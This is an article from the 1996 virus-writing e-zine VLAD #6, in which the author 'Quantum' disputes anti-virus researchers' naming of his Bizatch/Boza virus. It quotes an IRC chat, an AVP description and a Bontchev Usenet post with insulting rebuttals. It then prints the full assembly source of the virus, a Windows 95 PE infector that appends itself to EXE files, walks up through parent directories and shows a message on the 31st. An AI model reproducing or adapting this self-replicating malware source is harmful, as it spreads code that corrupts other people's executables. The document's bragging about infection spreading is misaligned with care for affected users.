Virus Labs & Distribution
VLAD #6 - The Boza Situation

The Boza Situation by Quantum / VLAD

On the 29th of January 1996 I was directed to an article at about the "world's first win95 virus".  Although
the article stated that the virus was written in Australia - it did not
state by whom the virus was written, and even though vlad was mentioned
(the new object created by Bizatch is ".vlad") it does not actually
state we wrote it.

While I was investigating the appearance, I had this conversation with the
#antivirus moderator, Hermanni:


-> *hermanni* you conscious ?
-> *hermanni* I dont know you.. and I doubt you know me.. but I hear you are
   rather well known in the AV community
*Hermanni* no, i don't think i know you.
-> *hermanni* neways.. do you happen to know a guy by the name of Paul
   Ducklin ?  AVer with a group called Sophos.. ?
*Hermanni* yes, i know paul.
-> *hermanni* ok.. he has written an article and had it placed on the sophos
   www site.. it is about the worlds first win95 virus..
-> *hermanni* I wrote this virus and I have mailed him at that address to
   tell him this and I have gotten no reply -> *hermanni* you see.. he has
   plucked a name for the virus out of the air he calls it "boza" .. even
   tho there are massive ascii strings in it clearly stating that the virus
   is called "bizatch"
-> *hermanni* eg Please note: the name of this virus is [Bizatch] written by
   Quantum of VLAD
-> *hermanni* rather annoying..
*Hermanni* yes, we're calling to 'Boza' as well. it's a good name.
-> *hermanni* it's NOT a good name.. where did you get "boza" from ?!!?
*Hermanni* well, we called it _3192 for some time, then somebody thought
           'Boza' would be more descriptive.
*Hermanni* i believe solomon and mcafee are calling it Boza as well.
-> *hermanni* calling it boza is not in your best interests.. paul ducklin is
-> *hermanni* going to look rather silly when vlad 6 comes out and it is
-> *hermanni* painfully obvious that the name was made up and the true name
-> *hermanni* was in the middle of the virus.. did you all even look for
-> *hermanni* strings ?
*Hermanni* hey, the name has already been decided.
*Hermanni* too late to complain, i'm afraid.
*Hermanni* do you have any idea how painful it is to get all the antivirus
           venders to change a name of a virus?
-> *hermanni* no.. the name was chosen when I wrote the virus.. the name was
   choosen when it escaped from our test systems and spread to every fewl who
   copies win95 executables..
-> *hermanni* are you aware of how annoying it is to sit and choose a virus
   name only to have it ignored by AV "researchers" ?
 too bad, i gotta go
 chat with you another time.
 fine.. perhaps Virus Bulletin Magazine will do a better job
 and if they do.. on your square head be it
*** QuantumG has left channel #antivirus


Generally, I think anti-virus authors need to adopt a much more professional 

Contrary to Paul Ducklin's claims, he (and Sophos) were not the first
antivirus company to discover this virus.  It seems that AVP was the
first to "discover" it:


     It is not a dangerous parasitic NewEXE(PE)-virus. It searches for
     EXE-files, checks the files for PE signature, then creates in
     EXE-file new section named ".vlad", and writes its code into that
     While infecting that virus uses calls to functions GetDir, SetDir,
     FindFirst, FindNext, OpenFile, LSeek, Read, Write, and CloseFile.
     First, it gets the current directory, and checks the Windows95
     kernel for some specific code. Then the virus searches for
     .EXE-files, and checks them for PE signature. Then the virus
     increases NumberOfSections field in PE-header, writes into the file
     new Section Header that describes new Section in the file, and
     writes itself to the end of the file.
     While executing the virus infects up to 3 files, and looks for
     .EXE-files in parent directories, if there are no more .EXE-files in
     the current one. Before return to the host program the virus
     restores the current directory.
     The virus checks some data (the system date?) and in some cases
     displays the messages:

 Bizatch by Quantum / VLAD
 The taste of fame just got tastier!
 VLAD Australia does it again with the world's first Win95 Virus
 From the old school to the new..
 Absolute Overlord

     The virus also contains the internal text strings:

 Please note: the name of this virus is [Bizatch] written by Quantum of VLAD

     The virus is not bugs-free, and in some cases Windows95 displays the
     error message while executing of infected EXE-files.


The claim of bugs in the virus are not without reason.  There ARE bugs
in the "Boza" virus.  As stated - Boza is a beta of Bizatch.  The bugs
are fixed in the final release (thus the word beta!).

(Quantum made a slight error here in the first release of vlad#6,
 on behalf of him, I'd like to apologise to Sara Gordon.  In the
 future he will make sure he confirms any information he receives.)

Looking through the alt.comp.virus news area, Metabolis came across a posting
by Vesselin Bontchev.  He has replied to it and I will include that reply

>> This morning on local news programs they are reporting (from the UK)
>> discovery of a virus out of Bulgaria called the BOZA virus, which
>> purportedly infects only Windows 95 systems, plus some related executable
>> files, and displays a message...anyone heard of this or is this just
>> another "chicken little" story...

> The story is rather funny, folks. Here are some "insider" details.

> First, the main thing in the story is right - the first Win95-specific
> virus (or, more exactly, the first PE-EXE infector) has been found.
> The rest is... well... a news report.

> The virus is written by the Australian virus writing group VLAD. It
> was intended to be published in the next issue of their virus writing
> electronic newsletter. However, they were obviously so proud with what
> they have done, that they didn't have the patience to wait for the
> official release of the newsletter and "leaked" the virus to the
> anti-virus people. After all, the "avers" know more than anyone else
> about viruses, so they should be the most able to appreciate the new
> "achievement".

What you anti virus people have, is a beta of our virus.  We gave it to 
a couple of people to test for us, and all of a sudden you guys seem to
have the source.  Leaking source to you would be the last thing I'd do.

> I first heard about this virus from a contact of mine in Germany - but
> didn't get a sample. (And didn't insist one one, BTW. Big deal, a
> PE-EXE infector. When it appears, we'll see it.) A few days ago we
> (CARO) got a sample sent to us by one of our members - Eugene
> Kaspersky; the author of AVP. Another CARO member works for the
> British anti-virus company Sophos. Obviously, Sophos have decided that
> the virus is worth making a noise about it in the media and has
> published a press release - which then has been copied and interpreted
> freely by the major media agencies.

Indeed, yet another media scare which will make you anti virus people a 
lot of money, I mean come on.. stop complaining.  We line your pockets.

> I, personally, think that the virus is not worth the noise. C'mon,
> folks, it is just a silly non-resident EXE-only infector, which works
> only in 32-bibt environments using the PE-EXE format (like Win95,
> WfW+WinG, or WinNT). FYI, "PE" stands for "Portable Executable". Such
> programs are supposed to be able to run in all the three environments
> mentioned above. On the top of that, the virus is buggy as hell -
> infected files sometimes become megabytes long. In short, it has
> virtually zero chances to spread and become a threat. On the top of
> that, the media quoted Sophos as "one British company", so they didn't
> get even advertising value from their press release. And it was
> certainly not them who discovered the virus.

Well gee, I wonder why the virus is buggy.. it's a beta!!  Not supposed 
to be released.  You'll have to wait for the magazine to get the full 
release.  As for it being silly, well.. do you see any others around?  We 
had to start somewhere..

> Now, about the virus name. That's the finniest part of the story. The
> virus contains several text strings, among which the phrase "Please
> note: the name of this virus is [Bizatch] written by Quantum of VLAD".
> It seemed that the virus writer who goes under the handle "Quantum"
> *very* much wanted to have "his" virus named "Bizatch". Well, we're
> not in the business of satisfying the virus writers' need for fame, so
> we (CARO) decided to name the virus differently, just inspite. :-)

Do you guys have anything better to be doing other than spiting virus 

> But how to name it? Some trivial name was proposed - like V32 (for
> 32-bit virus), but that looked too generic to me. Then I had an
> inspiration! The wannabe name of the virus sounded a bit like the
> [ABulgarian word "boza". In Bulgarian (and probably in Turkish), this
> word means a drink made of millit (and, as the rumour goes, of candies
> that have spoiled), which is semi-liquid and tends to ferment quickly
> (has to be consumed within 48 hours, or it gets spoiled) and has about
> 0.5% alcohol. It is something I call "the undrinkable Bulgarian
> drink", because most foreigners find it of horrible taste and tend to
> throw up after drinking it - while I (and many Bulgarians) find it
> delicious. :-) The drink has a light-brown color, is semi-liquid and
> looks like - yes, you guessed it.

> Furthermore, there is a Bulgarian slang expression "this is a complete
> 'boza'", meaning that something is totally messed-up/screwed-up (it's
> used only for things; not for situations). This is the expression a
> Bulgarian would use when faced with spagetti code or an incredibly
> buggy program. (Right, Windoze is a complete 'boza' too.) Since the
> virus in question is rather buggy, since there is at least one
> Bulgarian virus writer in Australia (going by the handle "Levski"),
> and since the term has a slightly offensive meaning when applied to a
> program, I thought that it would be a perfect name for this particular
> virus. Well, so it stuck. (The 'boza' is a sticky drink too.) :-)

Levski would like to code a virus I'm sure, but at this moment in time
writing anything in asm would be an impossibility.  Mainly because he
isn't a coder.  Next time you want to accuse someone of something, get
your facts straight first.

> So, to summarize, yes, the Boza virus really exists, yes, it displays
> a message in a window praising its creators, and no, it is not any
> serious threat. As usual, you can ignore almost everything the media
> says about computer viruses. It's real but it's not the end of the
> world, folks. Just yet another stupid virus out there - one which
> (thank goodness) has no chances to spread.

Smuch mi kura.. kogato razbirash kakvoto prikazvash togava el pri men i 
mi kaji nechto.  Do togava, pqlni si jobovete s pari or kakvoto nie 
pravime i jiveeme za.  Ebi se.



Bontchev, as of most AVers, has a high opinion of himself.  Giving a virus
multiple names will only confuse people who have the misfortune of coming
in contact with it.  Whoever released this beta of a virus into the wild
was very irresponsible - what's worse is they humiliated me in front of the
VX and AV community.  You have gained yourself at least one enemy.

Here is the beta of Bizatch (the actual virus code) that AV authors
around the world are calling "Boza".

vladseg segment para public 'vlad'
assume cs:vladseg
call recalc
pop ebp
mov eax,ebp
db 2dh
subme dd 30000h + (recalc - vstart)
push eax
sub ebp,offset recalc

mov eax,[ebp + offset kern2]
cmp dword ptr [eax],5350fc9ch
jnz notkern2
mov eax,[ebp + offset kern2]
jmp movit
mov eax,[ebp + offset kern1]
cmp dword ptr [eax],5350fc9ch
jnz nopayload
mov eax,[ebp + offset kern1]
mov [ebp + offset kern],eax

lea eax,[ebp + offset orgdir]
push eax
push 255
call GetCurDir

mov byte ptr [ebp + offset countinfect],0


lea eax,[ebp + offset win32_data_thang]
push eax
lea eax,[ebp + offset fname]
push eax
call FindFile

mov dword ptr [ebp + offset searchhandle],eax
cmp eax,-1
jz foundnothing


push 0
push dword ptr [ebp + offset fileattr]
push 3
push 0
push 0
push 80000000h + 40000000h
lea eax,[ebp + offset fullname]
push eax
call CreateFile

mov dword ptr [ebp + offset ahand],eax
cmp eax,-1
jz findnextone

push 0
push 0
push 3ch
push dword ptr [ebp + offset ahand]
call SetFilePointer

push 0
lea eax,[ebp + offset bytesread]
push eax
push 4
lea eax,[ebp + offset peheaderoffset]
push eax
push dword ptr [ebp + offset ahand]
call ReadFile

push 0
push 0
push dword ptr [ebp + offset peheaderoffset]
push dword ptr [ebp + offset ahand]
call SetFilePointer

push 0
lea eax,[ebp + offset bytesread]
push eax
push 58h
lea eax,[ebp + offset peheader]
push eax
push dword ptr [ebp + offset ahand]
call ReadFile

cmp word ptr [ebp + offset peheader],'EP'
jnz notape
cmp word ptr [ebp + offset peheader + 4ch],0F00Dh
jz notape

push 0
push 0
push dword ptr [ebp + offset peheaderoffset]
push dword ptr [ebp + offset ahand]
call SetFilePointer

push 0
lea eax,[ebp + offset bytesread]
push eax
push dword ptr [ebp + offset headersize]
lea eax,[ebp + offset peheader]
push eax
push dword ptr [ebp + offset ahand]
call ReadFile

mov word ptr [ebp + offset peheader + 4ch],0F00Dh

xor eax,eax
mov ax, word ptr [ebp + offset NtHeaderSize]
add eax,18h
mov dword ptr [ebp + offset ObjectTableoffset],eax

mov esi,dword ptr [ebp + offset ObjectTableoffset]
lea eax,[ebp + offset peheader]
add esi,eax
xor eax,eax
mov ax,[ebp + offset numObj]
mov ecx,40
xor edx,edx
mul ecx
add esi,eax

inc word ptr [ebp + offset numObj]    ; inc the number of objects

lea edi,[ebp + offset newobject]
xchg edi,esi

mov eax,[edi-5*8+8]
add eax,[edi-5*8+12]
mov ecx,dword ptr [ebp + offset objalign]
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + offset RVA],eax

mov ecx,dword ptr [ebp + offset filealign]
mov eax,vend-vstart
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + offset physicalsize],eax

mov ecx,dword ptr [ebp + offset objalign]
mov eax,vend - vstart + 1000h
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + offset virtualsize],eax

mov eax,[edi-5*8+20]
add eax,[edi-5*8+16]
mov ecx,dword ptr [ebp + offset filealign]
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + offset physicaloffset],eax

mov eax,vend-vstart+1000h
add eax,dword ptr [ebp + offset imagesize]
mov ecx,[ebp + offset objalign]
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + offset imagesize],eax

mov ecx,10
rep movsd

mov eax,dword ptr [ebp + offset RVA]

mov ebx,dword ptr [ebp + offset entrypointRVA]
mov dword ptr [ebp + offset entrypointRVA],eax

sub eax,ebx
add eax,5

mov dword ptr [ebp + offset subme],eax

push 0
push 0
push dword ptr [ebp + offset peheaderoffset]
push dword ptr [ebp + offset ahand]
call SetFilePointer

push 0
lea eax,[ebp + offset bytesread]
push eax
push dword ptr [ebp + offset headersize]
lea eax,[ebp + offset peheader]
push eax
push dword ptr [ebp + offset ahand]
call WriteFile

inc byte ptr [ebp + offset countinfect]

push 0
push 0
push dword ptr [ebp + offset physicaloffset]
push dword ptr [ebp + offset ahand]
call SetFilePointer

push 0
lea eax,[ebp + offset bytesread]
push eax
push vend-vstart
lea eax,[ebp + offset vstart]
push eax
push dword ptr [ebp + offset ahand]
call WriteFile


push dword ptr [ebp + offset ahand]
call CloseFile


cmp byte ptr [ebp + offset countinfect],3
jz outty

lea eax,[ebp + offset win32_data_thang]
push eax
push dword ptr [ebp + offset searchhandle]
call FindNext

or eax,eax
jnz gofile


xor eax,eax
lea edi,[ebp + offset tempdir]
mov ecx,256/4
rep stosd
lea edi,[ebp + offset tempdir1]
mov ecx,256/4
rep stosd

lea esi,[ebp + offset tempdir]
push esi
push 255
call GetCurDir

lea eax,[ebp + offset dotdot]
push eax
call SetCurDir

lea edi,[ebp + offset tempdir1]
push edi
push 255
call GetCurDir

mov ecx,256/4
rep cmpsd
jnz infectdir


lea eax,[ebp + offset orgdir]
push eax
call SetCurDir

lea eax,[ebp + offset systimestruct]
push eax
call GetTime

cmp word ptr [ebp + offset day],31
jnz nopayload

push  1000h
lea eax,[ebp + offset boxtitle]
push eax
lea eax,[ebp + offset boxmsg]
push eax
push 0
call MsgBox


pop eax
jmp eax

kern dd 0BFF93B95h
kern1 dd 0BFF93B95h
kern2 dd 0BFF93C1Dh

push 0BFF77744h
jmp [ebp + offset kern]

push 0BFF7771Dh
jmp [ebp + offset kern]

cmp [ebp + offset kern],0BFF93B95h
jnz gettimekern2
push 0BFF9D0B6h
jmp [ebp + offset kern]
push 0BFF9D14eh
jmp [ebp + offset kern]

push 0BFF638D9h
jmp [ebp + offset kern]

push 0BFF77893h
jmp [ebp + offset kern]

push 0BFF778CBh
jmp [ebp + offset kern]

push 0BFF77817h
jmp [ebp + offset kern]

push 0BFF76FA0h
jmp [ebp + offset kern]

push 0BFF75806h
jmp [ebp + offset kern]

push 0BFF7580Dh
jmp [ebp + offset kern]

push 0BFF7BC72h
jmp [ebp + offset kern]

countinfect db 0

fileattr dd 0
createtime dd 0,0
lastaccesstime dd 0,0
lastwritetime dd 0,0
filesize dd 0,0
resv dd 0,0
fullname db 256 dup (0)
realname db 14 dup (0)

boxtitle db "Bizatch by Quantum / VLAD",0
boxmsg db "The taste of fame just got tastier!",0dh
       db "VLAD Australia does it again with the world's first Win95 Virus"
       db 0dh,0dh
       db 9,"From the old school to the new..               ",0dh,0dh
       db 9,"Metabolis",0dh
       db 9,"Qark",0dh
       db 9,"Darkman",0dh
       db 9,"Automag",0dh
       db 9,"Antigen",0dh
       db 9,"RhinceWind",0dh
       db 9,"Quantum",0dh
       db 9,"Absolute Overlord",0dh
       db 9,"CoKe",0

message db "Please note: the name of this virus is [Bizatch]"
db " written by Quantum of VLAD",0

orgdir db 256 dup (0)
tempdir db 256 dup (0)
tempdir1 db 256 dup (0)
dotdot db "..",0

dw 0,0,0
day dw 0
dw 0,0,0,0

searchhandle dd 0
fname db '*.exe',0
ahand dd 0
peheaderoffset dd 0
ObjectTableoffset dd 0
bytesread dd 0

oname db ".vlad",0,0,0
virtualsize    dd 0
RVA            dd 0
physicalsize   dd 0
physicaloffset dd 0
reserved dd 0,0,0
objectflags    db 40h,0,0,0c0h

signature dd 0
cputype dw 0
numObj dw 0
db 3*4 dup (0)
NtHeaderSize dw 0
Flags dw 0
db 4*4 dup (0)
entrypointRVA dd 0
db 3*4 dup (0)
objalign dd 0
filealign dd 0
db 4*4 dup (0)
imagesize dd 0
headersize dd 0
db 1000h dup (0)
end vstart



ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag


ARTICLE.2_2       IBM-AV
ARTICLE.2_3       MIME Disasm
ARTICLE.2_4       Dark Fiber Tunneling
ARTICLE.2_5       Bait Detection
ARTICLE.2_6       MCB Stealth


Win95 Intro
ARTICLE.3_2       Win95 tute
ARTICLE.3_3       PE header format
ARTICLE.3_4       Bizatch
ARTICLE.3_5       The Boza Situation
ARTICLE.3_6       Bizatch News
ARTICLE.3_7       What's Next ?


Virus Descriptions
ARTICLE.4_2       Gilgamesh
ARTICLE.4_3       VIP
ARTICLE.4_4       SVL 1.2
ARTICLE.4_6       nimd00d3
ARTICLE.4_7       386 Virus


CLME Disasm
ARTICLE.5_2       Timber Wolf
ARTICLE.5_3       Serrelinda
ARTICLE.5_4       Insert v1.7
ARTICLE.5_5       Backwards
ARTICLE.5_6       TraceVir
ARTICLE.5_7       Lapis Lazuli

About VLAD - Links - Contact Us - Main